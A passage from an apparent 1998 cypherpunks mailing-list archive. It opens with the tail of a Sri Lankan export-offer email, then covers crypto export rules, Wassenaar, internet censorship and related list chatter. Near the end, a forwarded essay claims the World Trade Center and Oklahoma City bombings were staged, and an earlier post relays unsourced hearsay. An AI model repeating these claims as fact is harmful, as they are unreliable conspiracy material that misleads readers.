ix.Lantana Tea (Phyla Nodiflora)Recommended as Diuretic/Carminative.

 
4.CEYLON HERBAL PORRIDGE IN CONSUMER PACKETS.(HATHAWARIYA,-
 GOTUKOLA,WEL-PENELA,MUKUNUWENNA & IRAMUSU).

5.CEYLON HERBAL TEA (BLOOD PURIFYING TEA)- TEPHROSIA   PURPUREA,TINOSPORA
CORDIFOLIA,PHYLLANTHUS EMBLICA,-
 EVOLVULUS ALSINOIDES & CASSIA AURICULATA.

6.CEYOLN HERBAL TEA (SLIMMING TEA)-GYRINOPS WALLA,-
 BAUHINIA  VARIEGATE,ATALANTIA MISSIONIS,MINOSA PUDICA- 
 & CALOTROPIS GIGANTEA.
 
7.SPICES (BLACK PEPPER,CARDAMONS,CLOVES,GINGER,MACE,NUTMEG 
  TUMERIC AND CINNAMON).

8.FRESH COCONUTS AND DESICCATED COCONUT.

9.FIBER(COIR PRODUCTS)-FIBER MOSSTICK,HUSK CHIPS,COMPRESSED
COCOHUSK,DUST,PEAT.

10.SEA FOODS.DETAILS FOLLOWS:

i.Fish -Frozen/Chilled
ii.Shrimp.
iii.Black Tiger Farm Prawns.
iv.Giant Tiger Prawns.
v.Cattle fish.
vi.Octopus. 
vii.Live Prawns.
vii.Lobster (Live or Frozen)

Processing and Packing can be arranged to suite your requirements.All
shipments by Air and Carry Sri Lanka Government Health Certificate of Origin.

11.RICE AND DHAL (RED LENTILS ).

12.NARURAL RUBBER.

13.SUGER.

14.INTERNATIONAL BRAND NAME CIGARETTES.

15.INTERNATIONAL BRAND NAME BEER AND NON ALCOHOLIC BEER AND          LIQUOR.

16.ALL INTERNATIONAL BRAND NAME PERFUMES.

17.CRUDE OIL,PETROLEUM BY - PRODUCTS. 

18.MEAT PRODUCTS-CHICKEN/BEEF/PORK

WE ARE THANKING YOU IN ADVANCE FOR YOUR EARLY ATTENTION IN THIS REGARD.

BEST REGARDS,

LIONES ENTERPRISES
NO-30,SUNETHRADEVI ROAD,KOHUWALA, 
P.O.BOX-77 ,NUGEGODA,
SRI LANKA.
TEL   :0094 1 823464 (5 Lines)
FAX   :0094 1 823464
E.MAIL:anali@slt.lk   

****************************
We are following brand name Cigarettese and Beer manufacturer's Agent.
Details as follows:

CIGARETTES - ALL PRICES IN F.O.B.COLOMBO/SRI LANKA (USD.)
**********************************************************
ONE (01)CASE CONTAIN 10,000 STICKS
**********************************

1/MARLBORO - LIGHT/REGULER  
Origin:U.S.A.

2/MILD SEVEN -HARD PACK     
Origin:U.K. AND SWITZERLAND
 
3/DAVIDOFF -CLASSIC         
Origin:GERMANY

4/SUPER KING               
Origin:U.K.

5.REGAL KING SIZE           
Origin:U.K.

6.TEDLAPIDUS                
Origin:U.K.

7/ROTHMANS                  
Origin:U.K.

8/DUNHILL                   
Origin:U.K.

9/555 -REGULER/LIGHT        
Origin:U.K.

10/555 -INTERNATIONAL        
Origin:U.K. 

11.Camel,Winston,Salem and More Brand Cigarettes we can supply at the 
rate of USD.315.00

QUANTITY: 1 MASTER CASE = 10.000 Cigs
	  1 x 20' Container   = 430 Master cases
	  1 x 40' Container   = 920 Master cases

SHIPMENTS - 20' AND 40' FCL'S ONLY.

*************************
BEERS
*****

1.BARON'S BEER (MADE IN HOLLAND)
********************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

2.MASTER BEER(MADE IN HOLLAND)
******************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

3.HOLLANDIA BEER(MADE IN HOLLAND)
*********************************
Packing :24 cans per shrink-wrapped tray
         2277 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

4.BAVARIA BEER(MADE IN HOLLAND)
*******************************
Packing :24 cans per shrink-wrapped tray
         2261 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
 
5.ORANJEBOOM PREMIIM BEER(MADE IN HOLLAND)
******************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

6.REMBRANDT MASTERPIECR LAGER BEER(MADE IN HOLLAND)
***************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

7.MELCHERS PREMIUM EXPORT PILSENER(MADE IN HOLLAND)
***************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.

8.VAN DELFT PREMIUM EXPORT PILSENER(MADE IN HOLLAND)
****************************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
  
9.HEINEKEN (GREEN LABEL)MADE IN HOLLAND
***************************************
Packing :24 cans per shrink-wrapped tray
         2300 trays 24 x 330ml per 20'FCL
Quality :5% Vol.Alc.
  
GENERAL TERMS AND CONDITION
***************************
SHIPMENTS - 20' or 40' FCL'S ONLY.

DELIVERY TIME :Received your L/c to our Bank arrange the shipment 
 
Further informations 
********************
ATLANTIC NAVIGATIONS LINES (PVT) LTD
NO-30,SUNETHRADEVI ROAD , KOHUWALA ,
NUGEGODA.COLOMBO.
SRI LANKA.
TEL: 0094-1-823464 (5 LINES)
FAX: 0094-1-823464
E.Mail: anali@slt.lk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvcm.com>
Date: Thu, 31 Dec 1998 14:15:39 +0800
To: Frederick Burroughs <riburr@shentel.net>
Subject: Re: Stinger strike stagesetting
In-Reply-To: <368ADC62.EFC4A25C@shentel.net>
Message-ID: <v04003a05b2b0c0e6bc16@[24.1.50.17]>
MIME-Version: 1.0
Content-Type: text/enriched



There's a story in the Dec. 30, 1998 Washington Post about how US intelligence acquires foreign weapons technology. Specific mention is made about trading US Stinger missile know-how to China for whatever. My guess is the government's trying to set the stage to shift blame away from CIA for leaking antiaircraft missile technology, 1000 Stingers in the hands of Afghan rebels notwithstanding, and the aircraft disasters to come.

A Pakastani lecturer on NPR radio today (didn't catch his name) stated that one 'fallout' from the recent cruise missle attack of Ben Ladin's suspected Afgani lairs was a failed cruiser which landed in perfect working order in Pakastan. The Pakastanis consider this one of Allah's best recent gifts and their scientists are busy reverse engineering the bird.

--Steve




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Reeza! <howree@cable.navy.mil>
Date: Wed, 30 Dec 1998 22:54:40 +0800
To: Bill Stewart <ulf@fitug.de>
Subject: Re: Wassenaar summary (and a funny new loophole)
In-Reply-To: <36701BB5.BB2D78CC@algroup.co.uk>
Message-ID: <3.0.5.32.19981231000855.00991c10@205.83.192.13>
MIME-Version: 1.0
Content-Type: text/plain



Unfortunately, the WA still sucks, flies in the face of common sense, and
only makes sense if orwellian, or huxleyan predictions of future societies
are being actualized, today. I'm afraid. I'm very afraid,,,

Reeza!

	Be very afraid, Barney has his own movie.

	Now, tubetubbies not only steal the young'uns minds, 
	but their lives as well,,,



At 01:17 AM 12/30/98 -0800, Bill Stewart wrote:
>Unfortunately, since Wassenaar is not the law, only an agreement
>by bureaucrats to make laws or regulations sort of like it if
>they can talk their pet legislatures into rubberstamping them,
>this doesn't help.  
>
>You can't take a bureaucrat to court and 
>insist that she rescind a regulation that was stronger than the 
>Minimum Daily Repression specified in the "Arrangement" -
>you can only insist on whatever your nation's constitution (if any)
>or fundamental rights document (if any) specifies, 
>or perhaps go to the World Court or some European Union or 
>European Community court and argue the case there.
>But most of these rights documents say things like
>"except for national security" and aren't very enforceable
>even if they do plainly state that your rights are stronger than that.
>
>>Ulf Mller wrote the following about mistakes in Wassenaar:
>>> Since the definition differentiates algorithms by symmetry rather than by
>>> their cryptographic properties, there is no restriction whatsoever on
>>> asymmetric secret-key encryption algorithms. Those algorithms typically
>>> are not based on factorization or discrete logarithms. That is, they are
>>> no longer controlled by the Wassenaar arrangement.
>
>At 07:06 PM 12/10/98 +0000, Ben Laurie wrote:
>>Hmm - so if I defined a new crytpo algorithm, SED3, say, that looks
likethis:
>>SED3(k,x)=3DES(backwards(k),x)
>>where backwards(k) is k with its bits written backwards, then the
>>3DES/SED3(k1,k2) combination is exportable (where k1 is related to k2,
>>of course, by k2=backwards(k1))?
>
>I assume you mean 3DESDecrypt(backwards(k),x) ?  It still doesn't work,
>because 3DESEncrypt is still symmetric with 3DESDecrypt,
>and SED3Decrypt is still symmetric with 3DESEncrypt(backwards(k),x).
>But you could still come up with something that meets the
>letter of the non-law, just for the fun of tweaking them.
>
>I think it's more realistic to go for the various
>General Software Exemptions and Public Domain Exemptions,
>and generally lobby legislatures to slow down on implementing Bad Things,
>and let them see there's money to be made for their countries' 
>local businesses by not cooperating.  
>
>A potentially valuable change to go for would be to allow 
>export between members of the Wassenaar, or the EC, or whatever.
>After all, the whole purpose of the COCOM that Wassenaar grew out of
>was to keep Commies from getting militarily valuable technology,
>and now that there aren't any Commies (unless you count the Chinese or
Cubans)
>and they've let the Russians into Wassenaar, the whole thing's
>prima facie stupid anyway.
>
>				Thanks! 
>					Bill
>Bill Stewart, bill.stewart@pobox.com
>PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639
>
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevlar <webmaster@max-web.com>
Date: Thu, 31 Dec 1998 18:32:15 +0800
To: cypherpunks@toad.com
Subject: True Random Numbers
Message-ID: <3.0.6.32.19981231021342.007e9300@max-web.com>
MIME-Version: 1.0
Content-Type: text/plain



Several months ago, someone was talking about "True random numbers" and how
to obtain them, and I (rather ignorantly) suggested they run a recorded
sound through a program to record a 1 for every peak of volume over a
certian threshold , and a 0 for every thing quieter.(I think i suggested a
russeling tree, or a waterfall) Just adjust the threshold according to the
volume of your sampling. (it was clear in my mind, even if I can't explain
it here)

Little did I know...

Read phrack 54.5.
-Kevlar
<Webmaster@max-web.com>

Does God know Peano Algebra? Or does she not care if strong atheists
couldnt reason their way out of a trap made of Boolean presumptions?

A little bit of knowledge is a dangerous thing, but zero knowlege is
absolutely subversive.

Overspecialization breeds in weakness. It's a slow death.

Beat your algorithms into swords, your dumb terminals into shields, and
turn virtual machines into battlefields... Let the weak say, "I am strong"
and question authority. 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 31 Dec 1998 20:07:04 +0800
To: cypherpunks@einstein.ssz.com
Subject: BXA Crypto Rule
Message-ID: <199812311134.GAA29796@smtp0.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



BXA has issued today an interim rule on encryption items
which implements the administration's September export
policy announcement, and requests comments:

   http://jya.com/bxa123198.txt  (79K)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Davidson <abd@CDT.ORG>
Date: Thu, 31 Dec 1998 21:39:37 +0800
To: John Young <cypherpunks@EINSTEIN.ssz.com
Subject: Re: New Crypto Regs -- More of the Same
In-Reply-To: <199812301835.NAA26972@smtp3.mindspring.com>
Message-ID: <v03007802b2b12a3b9eb3@[207.226.3.12]>
MIME-Version: 1.0
Content-Type: text/plain



Here is CDT's statement on the new regs. They should be available in the
Federal Register this morning.

Happy Holidays to all. Here's hoping for some real relief in 1999.

	  -- Alan

Alan Davidson, Staff Counsel                 202.637.9800 (v)
Center for Democracy and Technology          202.637.0968 (f)
1634 Eye St. NW, Suite 1100                  <abd@cdt.org>
Washington, DC 20006                         PGP key via finger


December 30, 1998

New Encryption Regs Fail To Change Debate

The U.S. government is expected to publish new encryption export
regulations in the Federal Register tomorrow that once again grant only
limited relief for encryption exports. The new regulations implement the
policy announcement on encryption made by the White House last September.
While providing welcome incremental relief allowing export of 56-bit
encryption, and stronger products to certain industry sectors, the
Administration's latest liberalization effort leaves individual privacy at
risk and fails to resolve the broader issues surrounding U.S. encryption
policy.

"These latest encryption regulations are like rearranging the deck chairs
on the Titanic," said CDT Staff Counsel Alan Davidson. "While any export
relief is welcome, the U.S. government continues to embrace a failed
encryption policy based on export controls and backdoor plaintext access
features that threaten privacy and prevent people from protecting
themselves online. Today's announcement does little to change the broader
policy debate over how to give people the security tools they need to
protect their privacy in the Information Age.  We expect to continue the
policy debate, and the push for sensible encryption legislation, in
Congress next year."

Major features of the September White House policy, implemented in the new
regulations, include:
* Decontrol of 56-bit DES products or equivalent (hardware and software)
* Export of higher strength products for:
  * Subsidiaries of U.S. firms
  * Sectoral relief allowing export of strong encryption products to
    insurance companies and health and medical organizations
  * Limited relief allowing export of strong encryption products to online
    merchants for certain electronic commerce server applications only.
  * License exceptions allowing export of strong encryption product if they
    contain "recovery" or other "plaintext access" features (such as "private
    doorbells") that allow law enforcement access to plaintext without the
    notice or consent of the end user.

While CDT welcomes efforts by the Administration to grant greater export
relief, the new regulations leave privacy and security concerns unresolved,
particularly for individuals. These include:

* 56-bit DES is Not Strong Enough -- Expert cryptographers have argued for
years that 56-bit encryption is not sufficient to protect privacy online.
Just last summer, a group of California researchers created a "DES Cracker"
that broke a 56-bit length encrypted message in just 56 hours, using
minimal resources. RSA, the data security company, just this week offering
a new prize to anyone who can crack DES in one day. The new Administration
policy prohibits the export of far stronger 128-bit encryption products
that are becoming the world standard for security.

* Individual End-Users are Left Vulnerable -- While the relief offered for
particular industry sectors is welcome, individuals seeking to encrypt
securely abroad face are left vulnerable. The new policy begs the
questions: When do everyday computer users get encryption relief?

* U.S Policy Continues Push for Key Recovery and "Plaintext Access" -- The new
policy continues to push for adoption of key recovery and other plaintext
access products, granting broad relief for products "that, when activated,
allow[] recovery of the plaintext of encrypted data without the assistance
of the end user." Such access systems create new vulnerable backdoors,
jeopardizing personal privacy and creating security concerns where none
need exist. (See "The Risks of Key Recovery, Key Escrow, and Trusted Third
Party Encryption" experts report, available at
http://www.crypto.com/key_study.)

CDT remains committed to seeking broad relief from export controls and to
promoting the freedom of people to use whatever encryption tools they need
to protect their privacy online. For more information on this or other
encryption policy and Internet civil liberties issues, please contact Alan
Davidson or Ari Schwartz at CDT, (202) 637-9800.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 1 Jan 1999 01:20:07 +0800
To: abd@CDT.ORG
Subject: Learning experience
Message-ID: <368BAB83.6D30@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Thursday 12/31/98 9:49 AM

John Young

I did the first update this morning.

I wonder how many rows one gets in a table until the system bombs?

The Great Satan tries to bury its dissident citizens in its
hidden SECRET cemetery.

We will try to fix this problem.

bill

Title: pro se(Page 2)






      


  
    Pro Se [for youself] Litigation with the US Government
  
  
    Click 
    12/29/1998 -          
                           
                          
             
    Date
  
  
    TenFrap40
    Legal manuvering- Fed. R. App. P. 40. Petition for
      Rehearing
    12/31/1998
  
  
    foia3a47.txt
    Payne and Morales NSA lawsuitLetter accompanying Tenth Circuit ruling
       
    12/31/1998
  
  
    foia3a46.txt
    Payne and Morales NSA lawsuit Tenth Circuit Rule 54(b) ruling
    12/31/1998
  
  
    foia3a44.txt
    Payne and Morales address US Government lien
    12/31/1998
  
  
    foia3a43.txt
    Payne and Morales NSA lawsuit STATEMENT OF RULE
      54(b) CERTIFICATION
    12/31/1998
  
  
    bur13.txt 
    Payne exhausts administrative remedies at EEOC
    12/29/1998
  
  
    pena7.txt
    Payne exhausts administrative remedies at DOE
    12/29/1998
  
  
    jya.com
    This is a link to John Young's Cryptome web site
    12/29/1998
  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 31 Dec 1998 23:31:47 +0800
To: cypherpunks@cyberpass.net
Subject: DCSB Call for Speakers
Message-ID: <v04020a04b2b14426ae2a@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Date: Thu, 31 Dec 1998 09:51:21 -0500
To: dcsb@ai.mit.edu, dcsb-announce@ai.mit.edu
From: Robert Hettinga <rah@shipwright.com>
Subject: DCSB Call for Speakers
Sender: bounce-dcsb@ai.mit.edu
Reply-To: Robert Hettinga <rah@shipwright.com>

-----BEGIN PGP SIGNED MESSAGE-----


The Program Committee of the Digital Commerce Society invites any member of
the dcsb mailing lists to submit their proposal for a luncheon talk to the
Society.

Speakers can be any *principal* in any field of digital commerce. That means
anyone who is doing interesting research or development in, or who is making
significant market innovation in, the technology, finance, economics, law,
or policy of commerce on the global public internetwork.

The Committee tends to consider the person giving the talk first, and then
gives the speaker lots of discretion in the content of their talk -- as long
as it pertains to DCSB's charter to promote innovation in internet commerce.


The Society's meetings are held on the first Tuesday of the month at the
Downtown Branch of the Harvard Club of Boston, One Federal Street,
Thirty-Eighth Floor, in Boston, from 12 to 2 in the afternoon.

Unfortunately, the Society can not remunerate a speaker for any fees or
expenses other than, obviously, the speaker's lunch, and basic overhead
projection equipment. There is dial-up internet access for the meeting room.

If you, or anyone you know, are interested in speaking to the society,
please send, via email, a proposal, consisting of a single paragraph on the
speaker, and a single paragraph on the proposed talk, to Robert Hettinga
<mailto: rah@shipwright.com>, the chairman of the DCSB Program Committee,
and the Society's Moderator.

A list of previous speakers can be obtained with the following URL
<mailto:majordomo@ai.mit.edu?body=info%20dcsb>, or, if your
mailreader/browser doesn't support mailtos,

send

info dcsb

in the *body* of a message to majordomo@ai.mit.edu .

Thank you for considering DCSB in your speaking plans, and, if you have any
questions on your submission, please contact me directly.

Cordially,
Robert A. Hettinga
Moderator and Program Committee Chair,
The Digital Commerce Society of Boston

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNhTb/sUCGwxmWcHhAQHO2Qf/czV5QvJpM8RsX7UPydK0XAigPU6z+KxR
7sRwSOG+uguMLcEgvp+UItAOtXQc4ZGxMZib3LyqS9Hq3iZVHWTJkY/Qvk9kGUYH
WNia7+1JTWfpeScDn8VSLQP4SgXSDXPoAagzxkTGs8fOuuwndb3TeDQOsTZvC/Br
+Cb6cH5AM1rUr8IZBw7VJoLAkf0Hi3f1rtrWOp0lQ6DMcTVkfXy3lfa7scVXP90+
Wswa40wCrCp0O1N9mwhZa9BKGzztlksMRZzDLKVZe8tXqBMqdnQ6Un8cLLHIWdpK
PFs32XSN9YqXvUQozsthc2Ao0rz4wqlTE26UNhcwCqDff04KrJ5/BA==
=IhaG
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"The direct use of physical force is so poor a solution to the problem of
limited resources that it is commonly employed only by small children and
great nations." -- David Friedman, _The_Machinery_of_Freedom_


For help on using this list (especially unsubscribing), send a message to
"dcsb-request@ai.mit.edu" with one line of text: "help".

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Fri, 1 Jan 1999 01:34:21 +0800
To: "'Jim Choate'" <cypherpunks@EINSTEIN.ssz.com
Subject: RE: Norway - go to jail for naming baby illegal [CNN]
Message-ID: <D104150098E6D111B7830000F8D90AE84DDFDB@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain




> -----Original Message-----
> From:	Jim Choate [SMTP:ravage@EINSTEIN.ssz.com]
> Sent:	Thursday, December 24, 1998 4:43 PM
> To:	cypherpunks@EINSTEIN.ssz.com
> Subject:	Norway - go to jail for naming baby illegal [CNN]
> 
> Forwarded message:
> 
> > X-within-URL:
> http://www.cnn.com/WORLD/europe/9812/23/BC-Norway-NameLaws.ap/
> 
> > Mother of 14 jailed for violating Norway's baby-name law
> > 
> >    December 23, 1998
> >    Web posted at: 9:52 AM EST (1452 GMT)
> >    
> >    
> >    OSLO, Norway (AP) -- A mother of 14 was jailed this week because she
> >    refused to change the name she picked for her young son, even though
> >    that violated Norway's name law.
> >    
> >    Kirsti Larsen, 46, told the Verdens Gang newspaper that she named her
> >    son Gesher after she dreamed the child should be named "bridge."
> >    Gesher means bridge in Hebrew.
> >    
> >    Norway has strict laws regulating names, including lists of
> acceptable
> >    first and last names. In 1995, Larsen tried to register her son's
> name
> >    as Gesher at her local county office, which rejected the choice as
> >    illegal.
> 
> [text deleted]
> 
	[Trei, Peter]  
	This is the case in many countries - Germany and
	France for two.

	In Iceland, immigrants are required to change their
	names to Norse ones as part of the citizenship
	process.

	Peter Trei




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stewart, William C (Bill), BNSVC" <billstewart@att.com>
Date: Fri, 1 Jan 1999 03:05:20 +0800
To: cypherpunks@cyberpass.net
Subject: FWD: Boston Globe on International Net Threats
Message-ID: <25683280FF49D2119B480000C0AD5900A02B25@mo3980po13.ems.att.com>
MIME-Version: 1.0
Content-Type: text/plain





The Boston Globe
December 28, 1998
Pg. A1
Nations strive to limit freedom of the Internet 
By David L. Marcus, Globe Staff


WASHINGTON - As promised, the Internet is turning into an unstoppable 
geyser of information, a source of data, news and opinions that flow freely 
around the world.
Except in China, which blocks access to sites about Tibet, Taiwan, 
democratic movements and dissident groups.
Except in Saudi Arabia, which censors sites critical of the royal family.
Except in Germany, where a judge sentenced a CompuServe manager to two 
years in prison for allowing access to pornography.
Except in Cuba, which has seized laptop computers from dissidents as 
"subversive instruments."
In short, despite grand promises, the Internet is not yet an 
unrestricted electronic village green for the world. The more information 
that becomes available, the more governments try to stanch the flow with 
new filtering technologies or strict limits on who can use computers. 
Democracies as well as dictatorships are cracking down on sites that are 
found to be too dangerous, too lurid, or too controversial.
"The restrictions are coming fast and furious," said Barry Steinhardt, 
chairman of the Electronic Frontier Foundation, an advocacy group based in 
San Francisco, and head of the American Civil Liberties Union's task force 
on cyber-liberties. "The Internet is very frightening to many governments 
because it's an inherently democratic medium, so the first reaction is to 
reach out and control it."
At least 20 countries restrict access to Internet sites, from Bahrain, 
which bans electronic versions of Playboy magazine and home pages that the 
government says are pornographic, to Singapore, where the Ministry of 
Information and the Arts keeps out sexually explicit material and news 
critical of the government.
More than a dozen other countries are considering restrictions. The 
European Union, for example, is weighing proposals to ban child pornography 
and xenophobic materials. In Germany, freedom-of-speech advocates are 
outraged by a judge's decision in May to sentence the CompuServe official 
to jail (the judge suspended the sentence).
The United States, too, is trying to restrict the Internet. A 1996 law, 
the Communications Decency Act, criminalized on-line communcations that 
were "obscene, lewd, lascivious, filthy or indecent, with intent to annoy, 
abuse, threaten or harass another person." Under that definition, 
independent counsel Kenneth W. Starr's report to Congress on President 
Clinton probably would have been banned from the Net. The Supreme Court 
struck down the law, but another aimed at sites harmful to children is 
supposed to take effect next year.
A growing number of civil liberties groups - such as Global Internet 
Liberty Campaign, Digital Freedom Network, Internet Freedom, OpenNet, and 
Britain's Cyber-Rights and Cyber-Liberties - vehemently oppose restrictions 
on the Internet.
But many specialists argue that the issue is more complex. Shouldn't 
Germany have the right to restrict false and provocative Nazi propaganda? 
Shouldn't American states have the right to stop electronic dissemination 

of step-by-step instructions on assembling a car bomb? And why should any 
government allow child pornography to proliferate?
"In all countries, you will find people who argue that certain things 
should not be available to other people," said David Webster, chairman of 
the Transatlantic Dialogue on Broadcasting and the Information Society, a 
group that includes private industry and government. "No politician gets up 
and says: 'I think the availability of pedophilia material is concomitant 
to liberty.' He'll lose his seat."
The impulse to restrict access has been highlighted this month in 
China, where the government is holding its first trial of a 
"cyber-dissident." Lin Hai, a 30-year-old software engineer, is charged 
with inciting subversion by providing 30,000 Chinese e-mail addresses to a 
dissident group in Washington.
Lin, who says he is innocent, faces a maximum penalty of life in 
prison. Lawyers who follow China's one-sided judicial system say he is 
likely to be convicted.
In Shanghai, a physicist named Wang Youcai, who registered an 
independent political party, was sentenced to 11 years in prison. His 
crime: communicating with democracy activists inside and outside of China. 
As President Jiang Zemin cracks down on dissent, other cyber-sedition 
trials are likely in 1999.
Less dramatic but just as important, China's day-to-day censorship of 
the Internet affects scores of groups. The International Campaign for 
Tibet, for instance, often receives reports that the Chinese government has 
blocked access to its web site, said communications director Teresa 
Perrone. But she added that enterprising scholars in China often find ways 
to circumvent the censors and look at the group's information.
Several groups report that when the government blocks sites, the 
information still reaches Chinese via e-mail, bulletin boards, chat rooms, 
web sites with code words that filters cannot detect and a variety of 
creative ways.
"China may be the extreme case because they attempted to up a pretty 
impervious wall around the Internet," said Adam Clayton Powell III, vice 
president of the Freedom Forum, which advocates unrestricted media. 
"However, because China wants to be a world economic power they need 
high-speed,
real-time, financial information." Financial reports from services such as 
Dow Jones or Reuters often contain political news.
For every new restriction on the Net, there are new ways to get around 
it, said Vint Cerf, senior vice president for Internet architecture and 
technology at MCI-Worldcom. "It just isn't possible," to keep things away 
from Net viewers, he said.
But Jonathan Zittrain, executive director of the Berkman Center for 
Internet and Society at Harvard Law School, said improved technology will 
make it easier to keep track of who is looking at the Net and to restrict 
what is seen. "China has fairly crude tools for filtering, but my 
prediction is the Internet of 2000 is one that China will have less 
difficulty in regulating," he said.
Some countries that have sampled the Internet have found it 
distasteful. Last year, Vietnam decided to allow the public to use Internet 

services. But 10 days ago, the Communist Party decided to set up a 
committee to consider restrictions as a way of "correcting mistakes and 
bias," the Liberated Saigon newspaper reported.
"The stronger the central government, the more conservative they are in 
terms of allowing political information on the Internet," said Grey 
Burkhart, a retired communications expert from the Navy reserve who helps 
international groups get access to technology.
Burkhart has taken a special interest in developing countries, 
including Russia, Bosnia, and Syria. It isn't easy. Despite the 
government's pledges to open Syria, the country still has no Internet 
service provider. To access the Internet, computer users have to make 
long-distance calls to Lebanon and other countries. Syrians aren't allowed 
to have cellular telephones, which are considered a security risk.
This year, however, Syria allowed computer modems to be installed and 
an Internet service is promised.
The most restrictive countries, including Iraq, North Korea and Cuba, 
are those that control all forms of media, not just the Internet. In 
Havana's airport, several laptops carried in by passengers and intended for 
dissident groups have been seized in the last couple of years, said Frank 
Calzon, executive director of the Center for a Free Cuba.
Police even took a $150 electronic typewriter from a dissident becaue 
it was "an instrument of high-tech subversion," Calzon said.
Surprisingly, Latin America, which has a tradition of censorship, has 
been quite open to the Internet. Pedro Armendariz, the director of 
Investigative Editors and Reporters in Mexico, a non-profit group, has 
traveled to conferences in Brazil, Argentina, Colombia, Peru and throughout 
Mexico. Outside of Cuba, he has found no restrictions on the Net, other 
than the expense of service and unreliable telephone lines.
"I would dare to say that far from having serious restrictions in Latin 
America, we have a problem with sorting through so many things on the Net 
and discriminating about what is useful and what is garbage," Armendariz 
said.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Tu <ATU5713@compuserve.com>
Date: Fri, 1 Jan 1999 02:44:07 +0800
To: Cypher Punks Mailing List <cypherpunks@toad.com>
Subject: un-erata
Message-ID: <199812311318_MC2-651F-AFC3@compuserve.com>
MIME-Version: 1.0
Content-Type: text/plain



The URL in the README.!ST file in the package is correct, thanks to Ralf.

Alan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 1 Jan 1999 07:03:52 +0800
To: cypherpunks@cyberpass.net
Subject: critique of capitalism/moore
Message-ID: <199812312229.OAA04038@netcom13.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain




------- Forwarded Message

Date: Thu, 31 Dec 1998 13:04:29 -0500
From: "Mark A. Smith" <msmith01@flash.net>
To: Mark <msmith01@flash.net>
Subject: SNET: Police State Conspiracy - An Indictment (Conclusions)


- ->  SNETNEWS  Mailing List

This is a multi-part message in MIME format.

- --------------5E5047714EA
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

http://www.newdawnmagazine.com.au/51b.htm

- --------------5E5047714EA
Content-Type: text/plain; charset=us-ascii; name="51b.htm"
Content-Disposition: inline; filename="51b.htm"
Content-Transfer-Encoding: quoted-printable
X-MIME-Autoconverted: from 8bit to quoted-printable by echo.flash.net id MAA07108

                         THE POLICE STATE CONSPIRACY
                              =97 an INDICTMENT =97
                                   [Image]

                              By RICHARD MOORE

                             [CLOSING ARGUMENTS]

                 Presented before the GRAND JURY of LIBERTY

                        On this FOURTH DAY of HEARING

                           The PEOPLE v NWO Et Al

     Defendant 1 - NWO ("Corporate Globalist Elite")

     Defendant 2 - MEDIA ("Corporate Mass Media")

     Defendant 3 - GOVT ("National Government Leadership")

     Defendant 4 - INTELCOM ("Intelligence Community")

     Ladies and gentlemen of the jury, in the first three days of this
     hearing we have seen how the infrastructures of a police state
     are being established in the United States. Civil liberty
     protections have been systematically dismantled; conspiracy laws
     permit the conviction of people not involved in crimes; police
     forces are being paramilitarised; longer sentences are being
     given for minor offences; prison populations are growing
     dramatically. We have seen how factionalism is being promoted in
     order to divide society against itself; we have seen how the
     evidence shows that dramatic incidents, such as the World Trade
     Centre and Oklahoma Federal Building bombings, have been covertly
     and intentionally staged in order to avoid debate in the
     implementation of police-state measures.

     Today, in these closing arguments, we will examine two points.
     First, we will review the background of the NWO capitalist elite
     in order to understand why political suppression via police-state
     measures is an inevitable necessity for them. Second, we will
     review recent developments in Ireland, to show how police-state
     measures which took years to justify politically in the US are
     being exported wholesale to other Western countries.

     1. Capitalism and the Necessity of Police States in the West

     The religion of the NWO elite is capitalism, and the root of most
     of the problems of the world today, including the development of
     police states in the West, can be traced to the dynamics of
     capitalism. The dictionary definition of "capitalist" begins:

     "An investor of capital in business..."

     What distinguishes capitalism from earlier forms of private
